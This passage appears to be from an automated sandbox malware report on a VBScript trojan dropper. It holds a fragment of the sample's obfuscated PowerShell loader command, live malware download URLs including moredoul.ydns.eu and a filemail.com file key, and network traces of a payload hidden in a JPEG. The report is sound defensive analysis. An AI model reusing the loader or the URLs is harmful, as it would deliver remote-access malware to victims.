0#i#bb#fm#eqbz#hq#zqbt#c4#qwbv#g4#dgbl#hi#d#bd#do#ogbg#hi#bwbt#ei#yqbz#gu#ng#0#fm#d#by#gk#bgbn#cg#j#bs#gk#bwbk#gu#cgbh#ck#ow#k#gm#bwbu#hq#cgbp#hq#aqbv#g4#i##9#c##wwbt#hk#cwb0#gu#bq#u#fi#zqbm#gw#zqbj#hq#aqbv#g4#lgbb#hm#cwbl#g0#ygbs#hk#xq#6#do#t#bv#ge#z##o#cq#bqbh#hi#yqbi#g8#dqb0#hm#kq#7#cq#ywbv#gw#c#bv#hi#cgbo#gu#e#bp#hm#i##9#c##wwbk#g4#b#bp#gi#lgbj#e8#lgbi#g8#bqbl#f0#lgbh#gu#d#bn#gu#d#bo#g8#z##o#cc#vgbb#ek#jw#p#c4#sqbu#hy#bwbr#gu#k##k#g4#dqbs#gw#l##g#fs#bwbi#go#zqbj#hq#wwbd#f0#i#b##cg#j#bx#hu#yqbk#hi#aqbu#hy#yqby#gk#yqbu#hq#l##n#cc#l##n#cc#l##n#cc#l##n#ge#cwbw#g4#zqb0#f8#ywbv#g0#c#bp#gw#zqby#cc#l##n#cc#l##n#cc#l##n#cc#l##n#gg#d#b0#h##og#v#c8#bqbv#hi#zqbk#g8#dqbs#c4#eqbk#g4#cw#u#gu#dq#v#hm#bwb1#gw#lwbt#gk#bgbk#c4#d#b4#hq#jw#s#cc#qw#6#fw#u#by#g8#zwby#ge#bqbe#ge#d#bh#fw#jw#s#cc#zgbl#hi#cgbp#gm#eqbh#g4#a#b5#gq#cgbp#gm#jwJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information321
        Scripting
        Valid Accounts2
        Command and Scripting Interpreter
        321
        Scripting
        11
        Process Injection
        21
        Virtualization/Sandbox Evasion
        OS Credential Dumping1
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Exploitation for Client Execution
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        11
        Process Injection
        LSASS Memory1
        Process Discovery
        Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        PowerShell
        Logon Script (Windows)Logon Script (Windows)2
        Obfuscated Files or Information
        Security Account Manager21
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Software Packing
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput Capture3
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        Doc13032025.vbs23%VirustotalBrowse
        Doc13032025.vbs21%ReversingLabsScript-WScript.Trojan.Heuristic
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://1019.filemail.com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb1100%Avira URL Cloudmalware
        https://1019.filemail.com0%Avira URL Cloudsafe
        http://ip.1019.filemail.com0%Avira URL Cloudsafe
        http://moredoul.ydns.eu/soul/mind.txt100%Avira URL Cloudmalware
        https://1019.filemail.com/api/file/get?filekey=ZrKTNo-_DMWgm0oon0%Avira URL Cloudsafe
        https://1019.filemail.com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0%Avira URL Cloudsafe
        http://moredoul.ydns.eu/soul/mind.txtX100%Avira URL Cloudmalware
        http://1019.filemail.com0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        ip.1019.filemail.com
        142.215.209.80
        truefalse
          unknown
          1019.filemail.com
          unknown
          unknownfalse
            unknown
            NameMaliciousAntivirus DetectionReputation
            https://1019.filemail.com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb1false
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1387174750.0000025C76D98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://crl.mpowershell.exe, 00000001.00000002.1391644987.0000025C7F070000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbswscript.exe, 00000000.00000003.1297067424.0000012C098D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296117579.0000012C097D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1295113223.0000012C0781E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1292921213.0000012C096D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296444130.0000012C0982A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1292832290.0000012C096D1000.00000004.00000020.00020000.00000000.sdmp, Doc13032025.vbsfalse
                      high
                      https://go.micropowershell.exe, 00000001.00000002.1365582388.0000025C6794F000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://moredoul.ydns.eu/soul/mind.txtpowershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://contoso.com/powershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1387174750.0000025C76D98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://contoso.com/Licensepowershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/Iconpowershell.exe, 00000001.00000002.1387174750.0000025C76EDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://1019.filemail.compowershell.exe, 00000001.00000002.1365582388.0000025C6834F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1365582388.0000025C68471000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://1019.filemail.com/api/file/get?filekey=ZrKTNo-_DMWgm0oonpowershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1365582388.0000025C66D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/koswald/VBScriptwscript.exe, 00000000.00000003.1297067424.0000012C098D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296117579.0000012C097D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296576153.0000012C07877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1295113223.0000012C0781E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1297459594.0000012C07877000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1292693133.0000012C097B3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296444130.0000012C0982A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1292576276.0000012C09759000.00000004.00000020.00020000.00000000.sdmp, Doc13032025.vbsfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1365582388.0000025C66D21000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://1019.filemail.compowershell.exe, 00000001.00000002.1365582388.0000025C68477000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://1019.filemail.com/api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQgpowershell.exe, 00000001.00000002.1365582388.0000025C6834F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1365582388.0000025C66F4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://moredoul.ydns.eu/soul/mind.txtXpowershell.exe, 00000001.00000002.1365582388.0000025C6834F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://github.com/koswald/VBScript/blob/master/SetupPerUser.mdwscript.exe, 00000000.00000003.1292480959.0000012C096FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1297067424.0000012C098D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296117579.0000012C097D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1295113223.0000012C0781E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1296444130.0000012C0982A000.00000004.00000020.00020000.00000000.sdmp, Doc13032025.vbsfalse
                                          high
                                          http://ip.1019.filemail.compowershell.exe, 00000001.00000002.1365582388.0000025C68477000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          142.215.209.80
                                          ip.1019.filemail.comCanada
                                          32156HUMBER-COLLEGECAfalse
                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1636873
                                          Start date and time:2025-03-13 08:19:15 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 2m 27s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:5
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Doc13032025.vbs
                                          Detection:MAL
                                          Classification:mal100.expl.evad.winVBS@4/3@1/1
                                          EGA Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 6
                                          • Number of non-executed functions: 2
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbs
                                          • Stop behavior analysis, all processes terminated
                                          • Exclude process from analysis (whitelisted): SIHClient.exe, backgroundTaskHost.exe
                                          • Excluded IPs from analysis (whitelisted): 23.60.203.209
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 8432 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          TimeTypeDescription
                                          03:20:10API Interceptor41x Sleep call for process: powershell.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          142.215.209.80mgoodnicepersonneedyourverywell.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                            everynicepersonwalkingentireplacesgoodformegreat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                              BBVA S.A.,PDF.vbsGet hashmaliciousRemcosBrowse
                                                runbroke64.jsGet hashmaliciousUnknownBrowse
                                                  sv_time32.jsGet hashmaliciousUnknownBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    ip.1019.filemail.commgoodnicepersonneedyourverywell.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                    • 142.215.209.80
                                                    everynicepersonwalkingentireplacesgoodformegreat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                    • 142.215.209.80
                                                    BBVA S.A.,PDF.vbsGet hashmaliciousRemcosBrowse
                                                    • 142.215.209.80
                                                    runbroke64.jsGet hashmaliciousUnknownBrowse
                                                    • 142.215.209.80
                                                    sv_time32.jsGet hashmaliciousUnknownBrowse
                                                    • 142.215.209.80
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    HUMBER-COLLEGECAmiori.x86.elfGet hashmaliciousUnknownBrowse
                                                    • 142.215.133.162
                                                    mgoodnicepersonneedyourverywell.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                    • 142.215.209.80
                                                    everynicepersonwalkingentireplacesgoodformegreat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                    • 142.215.209.80
                                                    BBVA S.A.,PDF.vbsGet hashmaliciousRemcosBrowse
                                                    • 142.215.209.80
                                                    runbroke64.jsGet hashmaliciousUnknownBrowse
                                                    • 142.215.209.80
                                                    sv_time32.jsGet hashmaliciousUnknownBrowse
                                                    • 142.215.209.80
                                                    QUOTATION_FEBQUOTE312025#U00faPDF.scrGet hashmaliciousMSIL LoggerBrowse
                                                    • 142.215.209.70
                                                    Tuesdayconstraints.vbsGet hashmaliciousUnknownBrowse
                                                    • 142.215.209.72
                                                    0.vbsGet hashmaliciousUnknownBrowse
                                                    • 142.215.209.72
                                                    morninghtaaaafilex.htaGet hashmaliciousAgentTeslaBrowse
                                                    • 142.215.209.72
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3b5074b1b5d032e5620f69f9f700ff0ey79a2l1FY5.exeGet hashmaliciousDBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                    • 142.215.209.80
                                                    1.ps1Get hashmaliciousRHADAMANTHYSBrowse
                                                    • 142.215.209.80
                                                    Kiddion's Modest Menu v.1.0.0.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                    • 142.215.209.80
                                                    RQ-5218.msiGet hashmaliciousAteraAgentBrowse
                                                    • 142.215.209.80
                                                    wekissingbestgirleveryseenwithmygirl.htaGet hashmaliciousCobalt Strike, Snake Keylogger, VIP KeyloggerBrowse
                                                    • 142.215.209.80
                                                    mybestgirlfriendwalkingaroundtheworld.htaGet hashmaliciousCobalt Strike, DBatLoader, MSIL Logger, MassLogger RAT, PureLog StealerBrowse
                                                    • 142.215.209.80
                                                    mgoodnicepersonneedyourverywell.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                    • 142.215.209.80
                                                    everynicepersonwalkingentireplacesgoodformegreat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                    • 142.215.209.80
                                                    NavaioSecurityTest (3).exeGet hashmaliciousUnknownBrowse
                                                    • 142.215.209.80
                                                    FACTURA-PDF0012831029E8F001238VER-1.msiGet hashmaliciousUnknownBrowse
                                                    • 142.215.209.80
                                                    No context
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):1.1940658735648508
                                                    Encrypted:false
                                                    SSDEEP:3:NlllulVmdtZ:NllUM
                                                    MD5:013016A37665E1E37F0A3576A8EC8324
                                                    SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                    SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                    SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                    Malicious:false
                                                    Reputation:moderate, very likely benign file
                                                    Preview:@...e................................................@..........
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    File type:Unicode text, UTF-8 text, with very long lines (22002), with CRLF line terminators
                                                    Entropy (8bit):5.500958274957052
                                                    TrID:
                                                    • Visual Basic Script (13500/0) 100.00%
                                                    File name:Doc13032025.vbs
                                                    File size:184'483 bytes
                                                    MD5:188e7231fcea51d4ead4d2fbfeb435b6
                                                    SHA1:8adac6b4a9f7ca88bea76e230c0803ec4efb32a6
                                                    SHA256:6ef147fad49263cc33d1b2391e2647ca0aa81a28c3e4bb4d195493b6b713407d
                                                    SHA512:5180560c77453475cb0efb732b69c0ebcb35aa6c3cdf8eb6661a10a2d9f49305db5a1a0d9c7da85a78baae77a68567b68bf7d5bbbf098f3be7352c65fc3aa323
                                                    SSDEEP:1536:ykRHY4yDIOnfEIMwkJEJl0DQQ2sJ+WGevl:HdcIOMRSJl0DQQ2sJ+WGevl
                                                    TLSH:1E04A61BDE03951814BF82814A46BF8DF26864B73750BF8AB64D71DA4F3CA68CC749D8
                                                    File Content Preview:........ Sub cotyledonous.. nanocrowns = sinking.. For i = 1 To UBound(nanocrowns) Step 2.. purgeries = nanocrowns(i).. cauldronlike = nondieters(Array( "VBScripting.%s", purgeries )).. pentobarbital = non
                                                    Icon Hash:68d69b8f86ab9a86
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 13, 2025 08:20:11.893260956 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:11.893304110 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:11.893382072 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:11.902395964 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:11.902407885 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:14.489181042 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:14.489273071 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:14.535634041 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:14.535666943 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:14.536019087 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:14.551701069 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:14.596337080 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:15.597122908 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:15.597141981 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:15.597233057 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:15.597245932 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:15.597290993 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:15.614032030 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:15.614039898 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:15.614255905 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:15.614264965 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:15.622565985 CET44349710142.215.209.80192.168.2.5
                                                    Mar 13, 2025 08:20:15.622626066 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:15.631604910 CET49710443192.168.2.5142.215.209.80
                                                    Mar 13, 2025 08:20:15.631614923 CET44349710142.215.209.80192.168.2.5
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 13, 2025 08:20:11.878345013 CET6084253192.168.2.51.1.1.1
                                                    Mar 13, 2025 08:20:11.887909889 CET53608421.1.1.1192.168.2.5
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Mar 13, 2025 08:20:11.878345013 CET192.168.2.51.1.1.10x58d2Standard query (0)1019.filemail.comA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Mar 13, 2025 08:20:11.887909889 CET1.1.1.1192.168.2.50x58d2No error (0)1019.filemail.comip.1019.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                    Mar 13, 2025 08:20:11.887909889 CET1.1.1.1192.168.2.50x58d2No error (0)ip.1019.filemail.com142.215.209.80A (IP address)IN (0x0001)false
                                                    • 1019.filemail.com
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.549710142.215.209.804438432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-13 07:20:14 UTC191OUTGET /api/file/get?filekey=ZrKTNo-_DMWgm0oonSr97JAkdrUqbICVeG2LmuclzuON2ZavKqsQg0NqChSLT4A&pk_vid=342803d1cc4e3b801741606974b78eb1 HTTP/1.1
                                                    Host: 1019.filemail.com
                                                    Connection: Keep-Alive
                                                    2025-03-13 07:20:15 UTC323INHTTP/1.1 200 OK
                                                    Content-Length: 3244115
                                                    Content-Type: image/jpeg
                                                    Last-Modified: Mon, 10 Mar 2025 11:42:36 GMT
                                                    Accept-Ranges: bytes
                                                    ETag: 749810664fc5496e5942ee0a2f6a0564
                                                    X-Transfer-ID: ofbftuuzhtwysfh
                                                    Content-Disposition: attachment; filename=new_image.jpg
                                                    Date: Thu, 13 Mar 2025 07:20:14 GMT
                                                    Connection: close
                                                    2025-03-13 07:20:15 UTC3720INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c2 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff c4 00 19 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 fc 02 cb 12 a2 02 fb 3c
                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222p"<
